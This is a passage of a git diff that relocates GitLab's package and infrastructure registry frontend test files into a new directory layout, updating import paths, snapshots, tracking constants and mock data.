b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/__snapshots__/packages_list_app_spec.js.snap index 67e2594d29f..99a7b8e427a 100644 --- a/spec/frontend/packages/list/components/__snapshots__/packages_list_app_spec.js.snap +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/__snapshots__/packages_list_app_spec.js.snap @@ -34,12 +34,16 @@ exports[`packages_list_app renders 1`] = ` class="text-content gl-mx-auto gl-my-0 gl-p-5" > <h1 - class="h4" + class="gl-font-size-h-display gl-line-height-36 h4" > - There are no packages yet + + There are no packages yet + </h1> - <p> + <p + class="gl-mt-3" + > Learn how to <b-link-stub class="gl-link" diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_search_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_search_spec.js index 119b678cc37..b519ab00d06 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_search_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_search_spec.js @@ -1,6 +1,6 @@ import { shallowMount, createLocalVue } from '@vue/test-utils'; import Vuex from 'vuex'; -import component from '~/packages_and_registries/infrastructure_registry/components/infrastructure_search.vue'; +import component from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_search.vue'; import RegistrySearch from '~/vue_shared/components/registry/registry_search.vue'; import UrlSync from '~/vue_shared/components/url_sync.vue'; diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_title_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_title_spec.js index db6e175b054..b0e586f189a 100644 --- 
a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_title_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/infrastructure_title_spec.js @@ -1,5 +1,5 @@ import { shallowMount } from '@vue/test-utils'; -import component from '~/packages_and_registries/infrastructure_registry/components/infrastructure_title.vue'; +import component from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_title.vue'; import MetadataItem from '~/vue_shared/components/registry/metadata_item.vue'; import TitleArea from '~/vue_shared/components/registry/title_area.vue'; diff --git a/spec/frontend/packages/list/components/packages_list_app_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_app_spec.js index 5f7555a3a2b..cad75d2a858 100644 --- a/spec/frontend/packages/list/components/packages_list_app_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_app_spec.js @@ -4,12 +4,15 @@ import Vuex from 'vuex'; import setWindowLocation from 'helpers/set_window_location_helper'; import createFlash from '~/flash'; import * as commonUtils from '~/lib/utils/common_utils'; -import PackageListApp from '~/packages/list/components/packages_list_app.vue'; -import { DELETE_PACKAGE_SUCCESS_MESSAGE } from '~/packages/list/constants'; -import { SHOW_DELETE_SUCCESS_ALERT } from '~/packages/shared/constants'; -import { FILTERED_SEARCH_TERM } from '~/packages_and_registries/shared/constants'; +import PackageListApp from '~/packages_and_registries/infrastructure_registry/list/components/packages_list_app.vue'; +import { DELETE_PACKAGE_SUCCESS_MESSAGE } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import { + SHOW_DELETE_SUCCESS_ALERT, + FILTERED_SEARCH_TERM, +} from '~/packages_and_registries/shared/constants'; + import * as packageUtils from 
'~/packages_and_registries/shared/utils'; -import InfrastructureSearch from '~/packages_and_registries/infrastructure_registry/components/infrastructure_search.vue'; +import InfrastructureSearch from '~/packages_and_registries/infrastructure_registry/list/components/infrastructure_search.vue'; jest.mock('~/lib/utils/common_utils'); jest.mock('~/flash'); diff --git a/spec/frontend/packages/list/components/packages_list_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_spec.js index b1478a5e6dc..2fb76b98925 100644 --- a/spec/frontend/packages/list/components/packages_list_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/components/packages_list_spec.js @@ -3,11 +3,11 @@ import { mount, createLocalVue } from '@vue/test-utils'; import { last } from 'lodash'; import Vuex from 'vuex'; import stubChildren from 'helpers/stub_children'; -import PackagesList from '~/packages/list/components/packages_list.vue'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; -import { TrackingActions } from '~/packages/shared/constants'; -import * as SharedUtils from '~/packages/shared/utils'; +import PackagesList from '~/packages_and_registries/infrastructure_registry/list/components/packages_list.vue'; +import PackagesListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; +import { TRACKING_ACTIONS } from '~/packages_and_registries/shared/constants'; +import { TRACK_CATEGORY } from '~/packages_and_registries/infrastructure_registry/shared/constants'; import Tracking from '~/tracking'; import { packageList } from '../../mock_data'; @@ -190,26 +190,18 @@ describe('packages_list', () => { describe('tracking', () => { let 
eventSpy; - let utilSpy; - const category = 'foo'; beforeEach(() => { mountComponent(); eventSpy = jest.spyOn(Tracking, 'event'); - utilSpy = jest.spyOn(SharedUtils, 'packageTypeToTrackCategory').mockReturnValue(category); wrapper.setData({ itemToBeDeleted: { package_type: 'conan' } }); }); - it('tracking category calls packageTypeToTrackCategory', () => { - expect(wrapper.vm.tracking.category).toBe(category); - expect(utilSpy).toHaveBeenCalledWith('conan'); - }); - it('deleteItemConfirmation calls event', () => { wrapper.vm.deleteItemConfirmation(); expect(eventSpy).toHaveBeenCalledWith( - category, - TrackingActions.DELETE_PACKAGE, + TRACK_CATEGORY, + TRACKING_ACTIONS.DELETE_PACKAGE, expect.any(Object), ); }); diff --git a/spec/frontend/packages/list/stores/actions_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/actions_spec.js index adccb7436e1..3fbfe1060dc 100644 --- a/spec/frontend/packages/list/stores/actions_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/actions_spec.js @@ -3,10 +3,10 @@ import MockAdapter from 'axios-mock-adapter'; import testAction from 'helpers/vuex_action_helper'; import Api from '~/api'; import createFlash from '~/flash'; -import { MISSING_DELETE_PATH_ERROR } from '~/packages/list/constants'; -import * as actions from '~/packages/list/stores/actions'; -import * as types from '~/packages/list/stores/mutation_types'; -import { DELETE_PACKAGE_ERROR_MESSAGE } from '~/packages/shared/constants'; +import { MISSING_DELETE_PATH_ERROR } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import * as actions from '~/packages_and_registries/infrastructure_registry/list/stores/actions'; +import * as types from '~/packages_and_registries/infrastructure_registry/list/stores/mutation_types'; +import { DELETE_PACKAGE_ERROR_MESSAGE } from '~/packages_and_registries/shared/constants'; jest.mock('~/flash.js'); jest.mock('~/api.js'); 
diff --git a/spec/frontend/packages/list/stores/getters_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/getters_spec.js index 080bbc21d9f..f2d52ace34e 100644 --- a/spec/frontend/packages/list/stores/getters_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/getters_spec.js @@ -1,4 +1,4 @@ -import getList from '~/packages/list/stores/getters'; +import getList from '~/packages_and_registries/infrastructure_registry/list/stores/getters'; import { packageList } from '../../mock_data'; describe('Getters registry list store', () => { diff --git a/spec/frontend/packages/list/stores/mutations_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/mutations_spec.js index 2ddf3a1da33..afd7a7e5439 100644 --- a/spec/frontend/packages/list/stores/mutations_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/stores/mutations_spec.js @@ -1,7 +1,7 @@ import * as commonUtils from '~/lib/utils/common_utils'; -import * as types from '~/packages/list/stores/mutation_types'; -import mutations from '~/packages/list/stores/mutations'; -import createState from '~/packages/list/stores/state'; +import * as types from '~/packages_and_registries/infrastructure_registry/list/stores/mutation_types'; +import mutations from '~/packages_and_registries/infrastructure_registry/list/stores/mutations'; +import createState from '~/packages_and_registries/infrastructure_registry/list/stores/state'; import { npmPackage, mavenPackage } from '../../mock_data'; describe('Mutations Registry Store', () => { diff --git a/spec/frontend/packages/list/utils_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/utils_spec.js index 4e4f7b8a723..a897fb90522 100644 --- a/spec/frontend/packages/list/utils_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/list/utils_spec.js @@ 
-1,5 +1,8 @@ -import { SORT_FIELDS } from '~/packages/list/constants'; -import { getNewPaginationPage, sortableFields } from '~/packages/list/utils'; +import { SORT_FIELDS } from '~/packages_and_registries/infrastructure_registry/list/constants'; +import { + getNewPaginationPage, + sortableFields, +} from '~/packages_and_registries/infrastructure_registry/list/utils'; describe('Packages list utils', () => { describe('sortableFields', () => { diff --git a/spec/frontend/packages/mock_data.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/mock_data.js index 33b47cca68b..33b47cca68b 100644 --- a/spec/frontend/packages/mock_data.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/mock_data.js diff --git a/spec/frontend/packages/shared/components/__snapshots__/package_list_row_spec.js.snap b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/__snapshots__/package_list_row_spec.js.snap index b576f1b2553..67c3b8b795a 100644 --- a/spec/frontend/packages/shared/components/__snapshots__/package_list_row_spec.js.snap +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/__snapshots__/package_list_row_spec.js.snap @@ -6,7 +6,7 @@ exports[`packages_list_row renders 1`] = ` data-qa-selector="package_row" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> @@ -86,7 +86,7 @@ exports[`packages_list_row renders 1`] = ` </div> <div - class="gl-w-9 gl-display-none gl-sm-display-flex gl-justify-content-end gl-pr-1" + class="gl-w-9 gl-display-flex gl-justify-content-end gl-pr-1" > <gl-button-stub aria-label="Remove package" diff --git a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/infrastructure_icon_and_name_spec.js index 
ef26c729691..abb0d23b6e4 100644 --- a/spec/frontend/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/infrastructure_icon_and_name_spec.js @@ -1,6 +1,6 @@ import { GlIcon } from '@gitlab/ui'; import { shallowMount } from '@vue/test-utils'; -import InfrastructureIconAndName from '~/packages_and_registries/infrastructure_registry/components/infrastructure_icon_and_name.vue'; +import InfrastructureIconAndName from '~/packages_and_registries/infrastructure_registry/shared/infrastructure_icon_and_name.vue'; describe('InfrastructureIconAndName', () => { let wrapper; diff --git a/spec/frontend/packages/shared/components/package_list_row_spec.js b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/package_list_row_spec.js index 5f2fc8ddfbd..1052fdd1dda 100644 --- a/spec/frontend/packages/shared/components/package_list_row_spec.js +++ b/spec/frontend/packages_and_registries/infrastructure_registry/components/shared/package_list_row_spec.js @@ -2,13 +2,13 @@ import { GlLink } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagePath from '~/packages/shared/components/package_path.vue'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import { PACKAGE_ERROR_STATUS } from '~/packages/shared/constants'; +import PackagesListRow from '~/packages_and_registries/infrastructure_registry/shared/package_list_row.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import { PACKAGE_ERROR_STATUS } from '~/packages_and_registries/shared/constants'; import ListItem 
from '~/vue_shared/components/registry/list_item.vue'; -import { packageList } from '../../mock_data'; +import { packageList } from '../mock_data'; describe('packages_list_row', () => { let wrapper; @@ -17,12 +17,10 @@ describe('packages_list_row', () => { const [packageWithoutTags, packageWithTags] = packageList; const InfrastructureIconAndName = { name: 'InfrastructureIconAndName', template: '<div></div>' }; - const PackageIconAndName = { name: 'PackageIconAndName', template: '<div></div>' }; const findPackageTags = () => wrapper.findComponent(PackageTags); const findPackagePath = () => wrapper.findComponent(PackagePath); const findDeleteButton = () => wrapper.findByTestId('action-delete'); - const findPackageIconAndName = () => wrapper.findComponent(PackageIconAndName); const findInfrastructureIconAndName = () => wrapper.findComponent(InfrastructureIconAndName); const findListItem = () => wrapper.findComponent(ListItem); const findPackageLink = () => wrapper.findComponent(GlLink); @@ -41,7 +39,6 @@ describe('packages_list_row', () => { stubs: { ListItem, InfrastructureIconAndName, - PackageIconAndName, }, propsData: { packageLink: 'foo', @@ -93,13 +90,13 @@ describe('packages_list_row', () => { it('shows the type when set', () => { mountComponent(); - expect(findPackageIconAndName().exists()).toBe(true); + expect(findInfrastructureIconAndName().exists()).toBe(true); }); it('does not show the type when not set', () => { mountComponent({ showPackageType: false }); - expect(findPackageIconAndName().exists()).toBe(false); + expect(findInfrastructureIconAndName().exists()).toBe(false); }); }); @@ -135,27 +132,6 @@ describe('packages_list_row', () => { }); }); - describe('Infrastructure config', () => { - it('defaults to package registry components', () => { - mountComponent(); - - expect(findPackageIconAndName().exists()).toBe(true); - expect(findInfrastructureIconAndName().exists()).toBe(false); - }); - - it('mounts different component based on the provided values', 
() => { - mountComponent({ - provide: { - iconComponent: 'InfrastructureIconAndName', - }, - }); - - expect(findPackageIconAndName().exists()).toBe(false); - - expect(findInfrastructureIconAndName().exists()).toBe(true); - }); - }); - describe(`when the package is in ${PACKAGE_ERROR_STATUS} status`, () => { beforeEach(() => { mountComponent({ packageEntity: { ...packageWithoutTags, status: PACKAGE_ERROR_STATUS } }); diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap index c95538546c1..7aa42a1f1e5 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/components/details/__snapshots__/version_row_spec.js.snap @@ -5,7 +5,7 @@ exports[`VersionRow renders 1`] = ` class="gl-display-flex gl-flex-direction-column gl-border-b-solid gl-border-t-solid gl-border-t-1 gl-border-b-1 gl-border-t-transparent gl-border-b-gray-100" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js b/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js index d59c3184e4e..6ad6007c9da 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/details/package_title_spec.js @@ -2,7 +2,7 @@ import { GlIcon, GlSprintf } from '@gitlab/ui'; import { GlBreakpointInstance } from '@gitlab/ui/dist/utils'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import { shallowMountExtended } from 
'helpers/vue_test_utils_helper'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; import PackageTitle from '~/packages_and_registries/package_registry/components/details/package_title.vue'; import { PACKAGE_TYPE_CONAN, diff --git a/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js b/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js index f7613949fe4..faeca76d746 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/details/version_row_spec.js @@ -1,8 +1,8 @@ import { GlLink, GlSprintf, GlTruncate } from '@gitlab/ui'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { getIdFromGraphQLId } from '~/graphql_shared/utils'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import PublishMethod from '~/packages/shared/components/publish_method.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import PublishMethod from '~/packages_and_registries/shared/components/publish_method.vue'; import VersionRow from '~/packages_and_registries/package_registry/components/details/version_row.vue'; import ListItem from '~/vue_shared/components/registry/list_item.vue'; import TimeAgoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap index 2f2be797251..165ee962417 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap +++ 
b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/package_list_row_spec.js.snap @@ -6,7 +6,7 @@ exports[`packages_list_row renders 1`] = ` data-qa-selector="package_row" > <div - class="gl-display-flex gl-align-items-center gl-py-3 gl-px-5" + class="gl-display-flex gl-align-items-center gl-py-3" > <!----> @@ -77,7 +77,9 @@ exports[`packages_list_row renders 1`] = ` <div class="gl-display-flex gl-align-items-center gl-min-h-6" > - <span> + <span + data-testid="created-date" + > Created <timeago-tooltip-stub cssclass="" @@ -90,7 +92,7 @@ exports[`packages_list_row renders 1`] = ` </div> <div - class="gl-w-9 gl-display-none gl-sm-display-flex gl-justify-content-end gl-pr-1" + class="gl-w-9 gl-display-flex gl-justify-content-end gl-pr-1" > <gl-button-stub aria-label="Remove package" diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap index 919dbe25ffe..4407c4a2003 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/publish_method_spec.js.snap @@ -37,6 +37,7 @@ exports[`publish_method renders 1`] = ` text="b83d6e391c22777fca1ed3012fce84f633d7fed0" title="Copy commit SHA" tooltipplacement="top" + variant="default" /> </div> `; diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js b/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js index a276db104d7..292667ec47c 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/list/package_list_row_spec.js @@ -3,9 +3,11 @@ 
import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import { createMockDirective, getBinding } from 'helpers/vue_mock_directive'; import PackagesListRow from '~/packages_and_registries/package_registry/components/list/package_list_row.vue'; -import PackagePath from '~/packages/shared/components/package_path.vue'; -import PackageTags from '~/packages/shared/components/package_tags.vue'; -import PackageIconAndName from '~/packages/shared/components/package_icon_and_name.vue'; +import PackagePath from '~/packages_and_registries/shared/components/package_path.vue'; +import PackageTags from '~/packages_and_registries/shared/components/package_tags.vue'; +import PackageIconAndName from '~/packages_and_registries/shared/components/package_icon_and_name.vue'; +import PublishMethod from '~/packages_and_registries/package_registry/components/list/publish_method.vue'; +import TimeagoTooltip from '~/vue_shared/components/time_ago_tooltip.vue'; import { PACKAGE_ERROR_STATUS } from '~/packages_and_registries/package_registry/constants'; import ListItem from '~/vue_shared/components/registry/list_item.vue'; @@ -29,6 +31,9 @@ describe('packages_list_row', () => { const findPackageLink = () => wrapper.findComponent(GlLink); const findWarningIcon = () => wrapper.findByTestId('warning-icon'); const findLeftSecondaryInfos = () => wrapper.findByTestId('left-secondary-infos'); + const findPublishMethod = () => wrapper.findComponent(PublishMethod); + const findCreatedDateText = () => wrapper.findByTestId('created-date'); + const findTimeAgoTooltip = () => wrapper.findComponent(TimeagoTooltip); const mountComponent = ({ packageEntity = packageWithoutTags, @@ -153,4 +158,23 @@ describe('packages_list_row', () => { expect(findPackageIconAndName().text()).toBe(packageWithoutTags.packageType.toLowerCase()); }); }); + + describe('right info', () => { + it('has publish method component', () => { + mountComponent({ + packageEntity: { ...packageWithoutTags, pipelines: { nodes: 
packagePipelines() } }, + }); + + expect(findPublishMethod().props('pipeline')).toEqual(packagePipelines()[0]); + }); + + it('has the created date', () => { + mountComponent(); + + expect(findCreatedDateText().text()).toMatchInterpolatedText(PackagesListRow.i18n.createdAt); + expect(findTimeAgoTooltip().props()).toMatchObject({ + time: packageData().createdAt, + }); + }); + }); }); diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js b/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js index de4e9c8ae5b..97978dee909 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/components/list/packages_list_spec.js @@ -1,8 +1,8 @@ import { GlKeysetPagination, GlModal, GlSprintf } from '@gitlab/ui'; import { nextTick } from 'vue'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; -import PackagesListRow from '~/packages/shared/components/package_list_row.vue'; -import PackagesListLoader from '~/packages/shared/components/packages_list_loader.vue'; +import PackagesListRow from '~/packages_and_registries/package_registry/components/list/package_list_row.vue'; +import PackagesListLoader from '~/packages_and_registries/shared/components/packages_list_loader.vue'; import { DELETE_PACKAGE_TRACKING_ACTION, REQUEST_DELETE_PACKAGE_TRACKING_ACTION, diff --git a/spec/frontend/packages_and_registries/package_registry/mock_data.js b/spec/frontend/packages_and_registries/package_registry/mock_data.js index bacc748db81..4c23b52b8a2 100644 --- a/spec/frontend/packages_and_registries/package_registry/mock_data.js +++ b/spec/frontend/packages_and_registries/package_registry/mock_data.js @@ -16,11 +16,13 @@ export const packagePipelines = (extend) => [ ref: 'master', sha: 'b83d6e391c22777fca1ed3012fce84f633d7fed0', project: { + id: '1', name: 'project14', webUrl: 
'http://gdk.test:3000/namespace14/project14', __typename: 'Project', }, user: { + id: 'user-1', name: 'Administrator', }, ...extend, @@ -89,6 +91,7 @@ export const dependencyLinks = () => [ ]; export const packageProject = () => ({ + id: '1', fullPath: 'gitlab-org/gitlab-test', webUrl: 'http://gdk.test:3000/gitlab-org/gitlab-test', __typename: 'Project', @@ -127,6 +130,7 @@ export const packageData = (extend) => ({ }); export const conanMetadata = () => ({ + id: 'conan-1', packageChannel: 'stable', packageUsername: 'gitlab-org+gitlab-test', recipe: 'package-8/1.0.0@gitlab-org+gitlab-test/stable', @@ -179,6 +183,7 @@ export const packageDetailsQuery = (extendPackage) => ({ ...nugetMetadata(), }, project: { + id: '1', path: 'projectPath', }, tags: { @@ -270,6 +275,7 @@ export const packageDestroyFileMutationError = () => ({ export const packagesListQuery = ({ type = 'group', extend = {}, extendPagination = {} } = {}) => ({ data: { [type]: { + id: '1', packages: { count: 2, nodes: [ diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/app_spec.js.snap b/spec/frontend/packages_and_registries/package_registry/pages/__snapshots__/list_spec.js.snap index 5af75868084..dbe3c70c3cb 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/__snapshots__/app_spec.js.snap +++ b/spec/frontend/packages_and_registries/package_registry/pages/__snapshots__/list_spec.js.snap @@ -4,7 +4,7 @@ exports[`PackagesListApp renders 1`] = ` <div> <package-title-stub count="2" - helpurl="packageHelpUrl" + helpurl="/help/user/packages/index" /> <package-search-stub /> @@ -35,17 +35,21 @@ exports[`PackagesListApp renders 1`] = ` class="text-content gl-mx-auto gl-my-0 gl-p-5" > <h1 - class="h4" + class="gl-font-size-h-display gl-line-height-36 h4" > - There are no packages yet + + There are no packages yet + </h1> - <p> + <p + class="gl-mt-3" + > Learn how to <b-link-stub class="gl-link" event="click" - href="emptyListHelpUrl" 
+ href="/help/user/packages/package_registry/index" routertag="a" target="_blank" > diff --git a/spec/frontend/packages_and_registries/package_registry/components/list/app_spec.js b/spec/frontend/packages_and_registries/package_registry/pages/list_spec.js index ad848f367e0..2ac2a6455ef 100644 --- a/spec/frontend/packages_and_registries/package_registry/components/list/app_spec.js +++ b/spec/frontend/packages_and_registries/package_registry/pages/list_spec.js @@ -6,7 +6,7 @@ import { nextTick } from 'vue'; import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; -import PackageListApp from '~/packages_and_registries/package_registry/components/list/app.vue'; +import ListPage from '~/packages_and_registries/package_registry/pages/list.vue'; import PackageTitle from '~/packages_and_registries/package_registry/components/list/package_title.vue'; import PackageSearch from '~/packages_and_registries/package_registry/components/list/package_search.vue'; import OriginalPackageList from '~/packages_and_registries/package_registry/components/list/packages_list.vue'; @@ -16,11 +16,13 @@ import { PROJECT_RESOURCE_TYPE, GROUP_RESOURCE_TYPE, GRAPHQL_PAGE_SIZE, + EMPTY_LIST_HELP_URL, + PACKAGE_HELP_URL, } from '~/packages_and_registries/package_registry/constants'; import getPackagesQuery from '~/packages_and_registries/package_registry/graphql/queries/get_packages.query.graphql'; -import { packagesListQuery, packageData, pagination } from '../../mock_data'; +import { packagesListQuery, packageData, pagination } from '../mock_data'; jest.mock('~/lib/utils/common_utils'); jest.mock('~/flash'); @@ -32,9 +34,7 @@ describe('PackagesListApp', () => { let apolloProvider; const defaultProvide = { - packageHelpUrl: 'packageHelpUrl', emptyListIllustration: 'emptyListIllustration', - emptyListHelpUrl: 'emptyListHelpUrl', isGroupPage: true, fullPath: 'gitlab-org', 
}; @@ -66,7 +66,7 @@ describe('PackagesListApp', () => { const requestHandlers = [[getPackagesQuery, resolver]]; apolloProvider = createMockApollo(requestHandlers); - wrapper = shallowMountExtended(PackageListApp, { + wrapper = shallowMountExtended(ListPage, { localVue, apolloProvider, provide, @@ -113,7 +113,10 @@ describe('PackagesListApp', () => { await waitForFirstRequest(); expect(findPackageTitle().exists()).toBe(true); - expect(findPackageTitle().props('count')).toBe(2); + expect(findPackageTitle().props()).toMatchObject({ + count: 2, + helpUrl: PACKAGE_HELP_URL, + }); }); describe('search component', () => { @@ -213,12 +216,12 @@ describe('PackagesListApp', () => { it('generate the correct empty list link', () => { const link = findListComponent().findComponent(GlLink); - expect(link.attributes('href')).toBe(defaultProvide.emptyListHelpUrl); + expect(link.attributes('href')).toBe(EMPTY_LIST_HELP_URL); expect(link.text()).toBe('publish and share your packages'); }); it('includes the right content on the default tab', () => { - expect(findEmptyState().text()).toContain(PackageListApp.i18n.emptyPageTitle); + expect(findEmptyState().text()).toContain(ListPage.i18n.emptyPageTitle); }); }); @@ -234,8 +237,8 @@ describe('PackagesListApp', () => { }); it('should show specific empty message', () => { - expect(findEmptyState().text()).toContain(PackageListApp.i18n.noResultsTitle); - expect(findEmptyState().text()).toContain(PackageListApp.i18n.widenFilters); + expect(findEmptyState().text()).toContain(ListPage.i18n.noResultsTitle); + expect(findEmptyState().text()).toContain(ListPage.i18n.widenFilters); }); }); diff --git a/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap b/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap index f2087733d2b..5b56cb7f74e 100644 --- 
a/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap +++ b/spec/frontend/packages_and_registries/settings/group/components/__snapshots__/settings_titles_spec.js.snap @@ -3,7 +3,7 @@ exports[`settings_titles renders properly 1`] = ` <div> <h5 - class="gl-border-b-solid gl-border-b-1 gl-border-gray-200" + class="gl-border-b-solid gl-border-b-1 gl-border-gray-200 gl-pb-3" > foo diff --git a/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js b/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js index d3a970e86eb..f6c1d212b51 100644 --- a/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js +++ b/spec/frontend/packages_and_registries/settings/group/components/dependency_proxy_settings_spec.js @@ -1,6 +1,7 @@ -import { GlSprintf, GlLink, GlToggle } from '@gitlab/ui'; -import { shallowMount, createLocalVue } from '@vue/test-utils'; +import { GlSprintf, GlToggle } from '@gitlab/ui'; +import { createLocalVue } from '@vue/test-utils'; import VueApollo from 'vue-apollo'; +import { shallowMountExtended } from 'helpers/vue_test_utils_helper'; import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; @@ -12,14 +13,21 @@ import { } from '~/packages_and_registries/settings/group/constants'; import updateDependencyProxySettings from '~/packages_and_registries/settings/group/graphql/mutations/update_dependency_proxy_settings.mutation.graphql'; +import updateDependencyProxyImageTtlGroupPolicy from '~/packages_and_registries/settings/group/graphql/mutations/update_dependency_proxy_image_ttl_group_policy.mutation.graphql'; import getGroupPackagesSettingsQuery from '~/packages_and_registries/settings/group/graphql/queries/get_group_packages_settings.query.graphql'; import SettingsBlock from 
'~/vue_shared/components/settings/settings_block.vue'; -import { updateGroupDependencyProxySettingsOptimisticResponse } from '~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; +import SettingsTitles from '~/packages_and_registries/settings/group/components/settings_titles.vue'; import { - dependencyProxySettings, + updateGroupDependencyProxySettingsOptimisticResponse, + updateDependencyProxyImageTtlGroupPolicyOptimisticResponse, +} from '~/packages_and_registries/settings/group/graphql/utils/optimistic_responses'; +import { + dependencyProxySettings as dependencyProxySettingsMock, + dependencyProxyImageTtlPolicy as dependencyProxyImageTtlPolicyMock, dependencyProxySettingMutationMock, groupPackageSettingsMock, - dependencyProxySettingMutationErrorMock, + mutationErrorMock, + dependencyProxyUpdateTllPolicyMutationMock, } from '../mock_data'; jest.mock('~/flash'); @@ -30,46 +38,68 @@ const localVue = createLocalVue(); describe('DependencyProxySettings', () => { let wrapper; let apolloProvider; + let updateSettingsMutationResolver; + let 